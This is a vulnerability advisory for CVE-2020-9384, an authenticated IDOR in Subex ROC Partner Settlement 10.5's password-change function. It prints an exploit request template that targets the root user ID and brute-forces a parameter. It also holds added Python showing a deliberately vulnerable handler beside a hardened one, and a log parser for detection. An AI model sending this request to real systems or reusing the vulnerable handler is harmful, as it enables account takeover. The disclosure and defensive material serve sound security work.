| Title | Published | Views | Family |
|---|---|---|---|
| Subex ROC Partner Settlement Insecure Direct Object Reference (IDOR) Vulnerability | 15 Apr 2020 00:00 | – | cnvd |
| CVE-2020-9384 | 14 Apr 2020 19:52 | – | cve |
| CVE-2020-9384 | 14 Apr 2020 19:52 | – | cvelist |
| CVE-2020-9384 | 14 Apr 2020 20:15 | – | nvd |
| CVE-2020-9384 | 14 Apr 2020 20:15 | – | osv |
| Design/Logic Flaw | 14 Apr 2020 20:15 | – | prion |
| PT-2020-20625 · Subex · Subex Roc Partner Settlement | 14 Apr 2020 00:00 | – | ptsecurity |
| CVE-2020-9384 | 22 May 2025 17:06 | – | redhatcve |
| CVE-2020-9384 | 14 Apr 2020 19:52 | – | vulnrichment |
===========================================================================================================
Subex ROC Partner Settlement 10.5 - Authenticated IDOR in change password function leads to account takeover
===========================================================================================================
# Exploit Title: Insecure Direct Object Reference (IDOR) vulnerability in the change password function of Subex ROC Partner Settlement 10.5 allows remote authenticated users to take over accounts via manipulation of POST parameters.
# Date: 20 February 2020
# Exploit Author: Kitchaphan Singchai (idealphase), Jirawat Vuthawiphat (Freeze)
# Vendor Homepage: https://www.subex.com/partner-settlement/
# Software Link: [download link if available]
# Version: 10.5 (and probably earlier versions)
# CVE : CVE-2020-9384
[Summary]
The change password function is vulnerable to Insecure Direct Object Reference (IDOR): the account whose password is changed is selected by a
user ID supplied in the client request, not by the identity bound to the authenticated session. Any authenticated user can therefore set a new
password for another account, including the most privileged (root) user, and then log in as that user.
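The server-side check whose absence the summary describes, shown as an added Python example. This is not Subex code and does not reproduce the product's internals; the `User`, `Session` and `save_model_*` names, the in-memory store and the PBKDF2 hashing are made up to illustrate the defect class: a handler that takes the target row from the request model instead of from the session principal.

```python
"""Vulnerable and hardened versions of a saveModel-style password change.

Added example; not Subex code. It models only the defect class in the
advisory: the handler trusts the user ID carried in the request model
instead of the identity bound to the session.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Dict


@dataclass
class User:
    user_id: int
    username: str
    salt: bytes
    password_hash: bytes
    is_admin: bool = False


@dataclass
class Session:
    user_id: int  # set at login, never taken from the request body


class AuthorizationError(Exception):
    pass


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_user(user_id: int, username: str, password: str, is_admin: bool = False) -> User:
    salt = os.urandom(16)
    return User(user_id, username, salt, _hash(password, salt), is_admin)


def verify_password(user: User, password: str) -> bool:
    return hmac.compare_digest(user.password_hash, _hash(password, user.salt))


def _set_password(user: User, new_password: str) -> None:
    user.salt = os.urandom(16)
    user.password_hash = _hash(new_password, user.salt)


def save_model_vulnerable(store: Dict[int, User], session: Session, model: dict) -> bool:
    """IDOR: the target row is chosen by the client-supplied model['user_id'];
    the session only proves that *someone* is logged in."""
    target = store[int(model["user_id"])]
    _set_password(target, model["new_password"])
    return True


def save_model_hardened(store: Dict[int, User], session: Session, model: dict) -> bool:
    """Bind the object reference to the session principal. A self-service
    change must also prove the current password (an extra control that the
    request format in the advisory does not carry); only admins may change
    other accounts."""
    actor = store[session.user_id]
    target_id = int(model["user_id"])
    if target_id == actor.user_id:
        if not verify_password(actor, model.get("current_password", "")):
            raise AuthorizationError("current password required for self-service change")
    elif not actor.is_admin:
        raise AuthorizationError(f"user {actor.user_id} may not change password of user {target_id}")
    _set_password(store[target_id], model["new_password"])
    return True


def demo() -> dict:
    """Low-privilege user 2 targets the root account (user 1) in both versions."""
    store = {
        1: make_user(1, "root", "r00t-initial", is_admin=True),
        2: make_user(2, "lowpriv", "lowpriv-initial"),
    }
    session = Session(user_id=2)
    attack = {"user_id": 1, "new_password": "pwned"}
    save_model_vulnerable(store, session, attack)
    vulnerable_takeover = verify_password(store[1], "pwned")
    try:
        save_model_hardened(store, session, attack)
        hardened_blocked = False
    except AuthorizationError:
        hardened_blocked = True
    save_model_hardened(store, session,
                        {"user_id": 2, "current_password": "lowpriv-initial", "new_password": "new-own"})
    return {
        "vulnerable_takeover": vulnerable_takeover,
        "hardened_blocked": hardened_blocked,
        "self_change_ok": verify_password(store[2], "new-own"),
    }


if __name__ == "__main__":
    print(demo())
```

The decisive line is the comparison of the request's `user_id` with `session.user_id`; the current-password proof and the explicit admin path are defense in depth on top of that.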
[Vulnerability Details]
Authentication : any authenticated user.
Page : http://ip:port/commonService
[Sample HTTP POST request; the body is in Google Web Toolkit (GWT) RPC serialization format]
POST /<REDACTED_URI1>/<REDACTED_URI2>/commonService HTTP/1.1
Host: <REDACTED_IP_ADDRESS>:<REDACTED_PORT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: th,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: C2F56A526C284847E8CB55F5C9540273
X-GWT-Module-Base: https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI1>/<REDACTED_URI>/
Content-Length: 326
Connection: close
Referer: https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI>/<REDACTED_FILENAME>.html
Cookie: JSESSIONID=0DE915A64064A2C9A7CADB7B85EB71FB; GWT_LOCALE=en_GB; A48EE5E800701A3D7942009555C67E71=1002226284; 4587BA7D7CD481833715E8495588AFBF=410786149; session-id=session-id
7|2|24|https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI1>/<REDACTED_URI2>/|D451683615061B43F5EB83714BAECE53|com.google.gwt.user.client.rpc.XsrfToken/4254043109|25543866D9D80B67F35B7482D162B874|com.subex.spark.web.app.client.module.options.changepassword.ChangePasswordDetailService|saveModel|com.subex.spark.web.app.client.module.options.changepassword.UserTblModel/430295178|<INSERT_NEW_PASSWORD_HERE>|java.lang.Boolean/476441737|java.lang.Integer/3438268394|<INSERT_ARBITRARY_USERNAME_HERE>|com.subex.spark.web.app.client.framework.models.EntityTblForAbstractFSModel/3643375843|UserTbl|User|com.subex.gwt.datamodel.SerializerMap/3044779994|extraArgDfnModelList|ExtraControl|java.lang.String/2004016611||forceAlphaNumericValue|N|abstractEntityTbl|UserPassword|User Password|1|2|3|4|5|6|1|7|7|8|0|9|1|10|6|11|8|12|13|14|13|543|9|0|0|-6|0|-246160|1|1|0|0|0|11|-6|0|0|0|10|3|-6|0|0|<BRUTE_FORCE_THIS_INTEGER_VALUE_START_FROM_0_UNTIL_FOUND_//OK[0,[],0,7]_IN_HTTP_RESPONSE_MESSAGE>|-3|11|-6|0|<VICTIM_USER_ID_FOR_ROOT_USER_MOST_PRIVILEGE_IN_THIS_SYSTEM_IS_1>|1|1|15|4|16|0|17|18|19|20|18|21|22|12|23|24|23|535|-6|0|-6|0|-246162|1|1|0|25543866D9D80B67F35B7482D162B874
[Steps to reproduce]
(Removed at the exploit authors' request on 16 April 2020.)
[Expected HTTP response on a successful password change]
HTTP/1.1 200 OK
...
Content-Length: 14
Connection: close
//OK[0,[],0,7]
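As an added example (not part of the advisory and not Subex code), the following Python parses a GWT-RPC body of the shape shown above far enough to recover the module base, XSRF token, service interface, method and parameter types, so a proxy rule or log-review script can flag `ChangePasswordDetailService.saveModel` calls and pair them with the `//OK` success marker in the response. The field layout (version, flags, string-table length, string table, then an index stream that carries the XSRF token first when flag 0x2 is set) and the `\!` / `\\` escapes are the public GWT-RPC wire format. The sample body is constructed from the advisory's request template with the redacted host and the password, username and integer placeholders replaced by made-up values.

```python
"""Minimal GWT-RPC request parser for spotting password-change calls.

Added example, not code from the advisory or from Subex. SAMPLE_BODY is
the advisory's request body with <REDACTED_*> and <INSERT_*> placeholders
replaced by constructed values.
"""
from typing import Dict, List, Optional

FLAG_RPC_TOKEN_INCLUDED = 0x2  # GWT AbstractSerializationStream flag: XSRF token precedes the service name

SAMPLE_BODY = (
    "7|2|24|https://example.invalid/app/app/|D451683615061B43F5EB83714BAECE53|"
    "com.google.gwt.user.client.rpc.XsrfToken/4254043109|25543866D9D80B67F35B7482D162B874|"
    "com.subex.spark.web.app.client.module.options.changepassword.ChangePasswordDetailService|saveModel|"
    "com.subex.spark.web.app.client.module.options.changepassword.UserTblModel/430295178|NewP@ssw0rd|"
    "java.lang.Boolean/476441737|java.lang.Integer/3438268394|victimuser|"
    "com.subex.spark.web.app.client.framework.models.EntityTblForAbstractFSModel/3643375843|UserTbl|User|"
    "com.subex.gwt.datamodel.SerializerMap/3044779994|extraArgDfnModelList|ExtraControl|"
    "java.lang.String/2004016611||forceAlphaNumericValue|N|abstractEntityTbl|UserPassword|User Password|"
    "1|2|3|4|5|6|1|7|7|8|0|9|1|10|6|11|8|12|13|14|13|543|9|0|0|-6|0|-246160|1|1|0|0|0|11|-6|0|0|0|10|3|"
    "-6|0|0|0|-3|11|-6|0|1|1|1|15|4|16|0|17|18|19|20|18|21|22|12|23|24|23|535|-6|0|-6|0|-246162|1|1|0|"
    "25543866D9D80B67F35B7482D162B874|"
)


def tokenize(body: str) -> List[str]:
    """Split on unescaped '|'. GWT escapes '|' inside strings as '\\!' and a
    backslash as '\\\\'; other backslash sequences are passed through."""
    tokens: List[str] = []
    cur: List[str] = []
    i = 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body) and body[i + 1] in "!\\":
            cur.append("|" if body[i + 1] == "!" else "\\")
            i += 2
            continue
        if ch == "|":
            tokens.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    if cur:  # body captured without the usual trailing '|'
        tokens.append("".join(cur))
    return tokens


def parse_gwt_rpc(body: str) -> Dict[str, object]:
    tokens = tokenize(body)
    version, flags, nstrings = int(tokens[0]), int(tokens[1]), int(tokens[2])
    strings = tokens[3:3 + nstrings]
    if len(strings) != nstrings:
        raise ValueError("truncated string table")
    refs = tokens[3 + nstrings:]  # 1-based string-table indexes mixed with raw ints

    def s(pos: int) -> str:
        return strings[int(refs[pos]) - 1]

    module_base, strong_name = s(0), s(1)
    pos = 2
    xsrf_token: Optional[str] = None
    if flags & FLAG_RPC_TOKEN_INCLUDED:
        xsrf_token = s(3)  # s(2) is the XsrfToken type name; its serializer writes one string
        pos = 4
    service, method = s(pos), s(pos + 1)
    nparams = int(refs[pos + 2])
    param_types = [s(pos + 3 + k) for k in range(nparams)]
    return {
        "version": version, "flags": flags, "module_base": module_base,
        "strong_name": strong_name, "xsrf_token": xsrf_token, "service": service,
        "method": method, "param_types": param_types, "strings": strings,
    }


def is_password_change_call(parsed: Dict[str, object]) -> bool:
    return str(parsed["service"]).endswith(".ChangePasswordDetailService") and parsed["method"] == "saveModel"


def response_is_success(body: str) -> bool:
    """GWT-RPC responses start with //OK on success and //EX when the server threw."""
    return body.startswith("//OK")


if __name__ == "__main__":
    p = parse_gwt_rpc(SAMPLE_BODY)
    print(p["service"], p["method"], p["param_types"])
    print("password change call:", is_password_change_call(p))
```

Run against proxy logs, pairing each flagged `saveModel` request with its `//OK` response gives the audit trail a defender would want for this flaw; the raw integers after the string table (including the one the advisory marks as brute-forced and the victim user ID) are model-specific and are left unparsed here.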
[Timeline]
2/Oct/2019 - Contacted Subex live chat, sent details to the associated e-mail address and got a first response
4/Oct/2019 - Subex said that they had had an internal discussion at Subex and that the product team would take care of the problem internally.
18/Nov/2019 - While waiting for an update from Subex, sent details about public vulnerability disclosure; Subex said that they would discuss this internally and get back at the earliest.
20/Feb/2020 - Sent CVE request on https://cveform.mitre.org/ and submitted exploit details to exploit-db
25/Feb/2020 - CVE assigned as CVE-2020-9384